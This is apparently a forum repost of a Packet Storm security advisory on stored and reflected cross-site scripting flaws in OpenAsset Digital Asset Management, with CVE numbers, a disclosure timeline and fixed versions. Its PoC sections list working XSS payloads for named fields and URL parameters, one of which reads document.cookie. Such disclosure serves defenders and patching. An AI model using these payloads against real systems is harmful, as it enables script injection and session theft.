OpenAsset Digital Asset Management Cross Site Scripting

#235
Topic created · 1 Posts · 0 Views
  • The OpenAsset Digital Asset Management web application suffers from multiple reflected and persistent cross site scripting vulnerabilities. Vulnerable versions include 12.0.19 (Cloud) and 11.2.1 (On-premise)
    .
    MD5 | 35b3d6bf27bfcacaa597e0ed89c5cc54
    Download

    Title: Stored cross-site scripting (XSS)  
    Product: OpenAsset Digital Asset Management by OpenAsset  
    Vendor Homepage: https://www.openasset.com/  
    Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)  
    Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise)  
    CVE Number: CVE-2020-28857  
    Author: Jack Misiura from The Missing Link   
    Website: https://www.themissinglink.com.au  
    Timeline:  
    2020-11-14 Disclosed to Vendor  
    2020-12-04 Vendor releases final patches  
    2020-12-10 Publication  
    1. Vulnerability Description  
    The OpenAsset Digital Asset Management web application allowed for stored cross-site scripting attacks against various parameters and endpoints. Vulnerable parts of the web application include:  
    * System Preferences  
    * Project Code regex field  
    * User name regex field  
    * Password regex field  
    * All three description fields  
    * First Album Name field  
    * Visit Items Per SOAP request field  
    * Categories description  
    * Keywords, triggered on deletion attempts  
    * Editing photographer name  
    * Access token name  
    * Web share name  
    2. PoC  
    For system preferences fields, the following payloads can be used:  
    " autofocus onfocus="alert('Stored XSS');" abc="  
    "><script>alert("Script stored XSS");</script>  
    For categories description:  
    Category Name Goes Here<script>alert('Description stored XSS');</script>  
    For keywords:  
    Delete Me<script>alert(1234);</script>  
    Photographer name:  
    John Smith<script>alert("XSS Attack!");</script>  
    Access token name:  
    TokenName"><script>alert("Stored XSS Tokens")</script>  
    Web share name:  
    Share<script>alert("Stored XSS Web Share Name");</script>  
    3. Solution  
    The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.  
    4. Advisory URL  
    https://www.themissinglink.com.au/security-advisories  
    --------  
    Title: Reflected cross-site scripting (XSS)  
    Product: OpenAsset Digital Asset Management by OpenAsset  
    Vendor Homepage: https://www.openasset.com/  
    Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)  
    Fixed Version: 12.0.22 (Cloud) 11.4.10 (On-premise)  
    CVE Number: CVE-2020-28859  
    Author: Jack Misiura from The Missing Link   
    Website: https://www.themissinglink.com.au  
    Timeline:  
    2020-11-14 Disclosed to Vendor  
    2020-12-04 Vendor releases final patches  
    2020-12-10 Publication  
    1. Vulnerability Description  
    Multiple reflected cross-site scripting (XSS) vulnerabilities in the OpenAsset Digital Asset Management software allows remote attackers to inject arbitrary JavaScript or HTML via:  
    * Account recovery/password reset page through the email parameter  
    * Saved search request, through the id parameter  
    * Search result request, through both the imageViewId and lpFilterInputId parameters  
    2. PoC  
    Account recovery:  
    https://example.com/Page/StartAccountRecovery?ok=1 <https://example.com/Page/StartAccountRecovery?ok=1&email=test%40test%3cscript%3ealert(document.cookie)%3c%2Fscript%3e.com> &email=test%40test<script>alert(document.cookie)<%2Fscript>.com  
    Saved search request:  
    https://example.com/AJAXPage/SavedSearch?id=167826 <https://example.com/AJAXPage/SavedSearch?id=167826%22')%3b%7d%3b%7d%5d%7d)%3b%3c/script%3e%3cscript%3ealert(%22Reflected%20XSS!%22)%3b%3c/script> "')%3b}%3b}]})%3b</script><script>alert("Reflected%20XSS!")%3b</script>  
    "');}}}]});alert(123);  
    Search result request:  
    https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript <https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript%3ealert(%22more+xss+here%22)%3b%3c/script> >alert("more+xss+here")%3b</script>  
    3. Solution  
    The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.  
    4. Advisory URL  
    https://www.themissinglink.com.au/security-advisories  
    

    Source: packetstormsecurity.com

Log in to reply